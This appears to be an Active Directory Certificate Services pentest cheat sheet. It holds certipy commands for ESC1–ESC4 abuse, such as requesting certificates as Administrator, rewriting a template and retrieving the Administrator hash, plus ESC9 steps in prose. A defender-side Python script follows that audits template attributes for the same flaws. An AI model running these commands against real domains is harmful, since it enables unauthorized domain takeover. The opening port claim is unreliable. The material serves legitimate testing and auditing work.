Active Directory Certificate Services (AD CS)
If ports 3268 and 3269 are open, certificate services should be checked!
Find Vulnerable Certificates
certipy find -username <USERNAME>@<DOMAIN> -password <PASSWORD> -dc-ip <RHOST> -vulnerable -stdout
ESC1: Misconfigured Certificate Templates
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE> -upn administrator@<DOMAIN> -dns <RHOST>
certipy auth -pfx administrator.pfx -dc-ip <RHOST>
ESC2: Misconfigured Certificate Templates
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE>
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template User -on-behalf-of '<DOMAIN>\Administrator' -pfx <USERNAME>.pfx
certipy auth -pfx administrator.pfx -dc-ip <RHOST>
ESC3: Enrollment Agent Templates
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE>
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template User -on-behalf-of '<DOMAIN>\Administrator' -pfx <USERNAME>.pfx
certipy auth -pfx administrator.pfx -dc-ip <RHOST>
ESC4: Vulnerable Certificate Template Access Control
First, overwrite the template configuration to make it vulnerable to ESC1:
certipy-ad template -dc-ip <ip> -u <user> -p <pass> -template <templateName> -target <ip> -save-old
Then, request a certificate based on the ESC4 template, just like ESC1:
certipy-ad req -username <user> -password <pass> -ca <ca_name> -template <templateName> -upn Administrator@<domain> -target-ip <ip> -dns <dns_dc>
Get the hash:
certipy-ad auth -pfx administrator_dc01.pfx -dc-ip <ip>
ESC9
User1 has GenericWrite over user2, so we can get user2's hash using Shadow Credentials.
We can also change the password of that user:
In this step, we change user2's userPrincipalName to Administrator:
We request the vulnerable ESC9 template as user2:
Finally, we get the Administrator hash:
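As an added defender-side example (not part of the original cheat sheet), the following Python reproduces the template-side conditions behind the ESC1, ESC2, ESC3 and ESC9 cases above from the raw template attributes, so the same misconfigurations can be audited and corrected without running certipy. The attribute names are the real LDAP attributes of certificate template objects; the sample templates are constructed.

```python
# Added example, not part of the original cheat sheet: a defender-side audit of the
# template attributes behind the ESC1/ESC2/ESC3/ESC9 findings that "certipy find
# -vulnerable" reports. Each template is a dict of LDAP attributes read from
# CN=Certificate Templates,CN=Public Key Services,... Enrollment ACLs (ESC4) and the
# DC-side certificate-mapping registry values are out of scope here.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag: manager approval
CT_FLAG_NO_SECURITY_EXTENSION = 0x00080000      # msPKI-Enrollment-Flag: no SID extension
ANY_PURPOSE_EKU = "2.5.29.37.0"
CERT_REQUEST_AGENT_EKU = "1.3.6.1.4.1.311.20.2.1"
CLIENT_AUTH_EKUS = {"1.3.6.1.5.5.7.3.2",        # Client Authentication
                    "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
                    "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
                    ANY_PURPOSE_EKU}

def template_findings(tpl):
    """Return the set of ESC labels whose template-side conditions all hold."""
    # Manager approval or a required authorized signature gates issuance (the standard fix).
    if tpl["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS or tpl["msPKI-RA-Signature"] > 0:
        return set()
    ekus = set(tpl["pKIExtendedKeyUsage"])
    usable_for_auth = bool(ekus & CLIENT_AUTH_EKUS) or not ekus  # no EKU = any purpose
    findings = set()
    if tpl["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT and usable_for_auth:
        findings.add("ESC1")  # requester picks the SAN UPN (the -upn flag above)
    if not ekus or ANY_PURPOSE_EKU in ekus:
        findings.add("ESC2")  # any purpose, so also usable as an enrollment agent
    if CERT_REQUEST_AGENT_EKU in ekus:
        findings.add("ESC3")  # enrollment-agent certs for -on-behalf-of requests
    if tpl["msPKI-Enrollment-Flag"] & CT_FLAG_NO_SECURITY_EXTENSION and usable_for_auth:
        findings.add("ESC9")  # no SID binding: DC maps the cert by UPN/DNS name
    return findings

def audit(templates):
    """Template name -> sorted findings; an empty list means no template-side issue."""
    return {name: sorted(template_findings(t)) for name, t in templates.items()}

# Constructed sample data, not from a real forest; "User" is modelled on the built-in template.
SAMPLE_TEMPLATES = {
    "User": {"msPKI-Certificate-Name-Flag": 0xA6000000, "msPKI-Enrollment-Flag": 0x29,
             "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"]},
    "VPN-Clients": {"msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
                    "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"]},
    "Agent-Open": {"msPKI-Certificate-Name-Flag": 0xA6000000, "msPKI-Enrollment-Flag": 0x0,
                   "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": [CERT_REQUEST_AGENT_EKU]},
    "Agent-Approved": {"msPKI-Certificate-Name-Flag": 0xA6000000, "msPKI-Enrollment-Flag": 0x2,
                       "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": [CERT_REQUEST_AGENT_EKU]},
    "Legacy-NoSid": {"msPKI-Certificate-Name-Flag": 0xA6000000, "msPKI-Enrollment-Flag": 0x80000,
                     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"]},
}
```

Run audit() over templates exported from the configuration partition; "Agent-Approved" shows how enabling manager approval clears a finding that is otherwise identical to "Agent-Open".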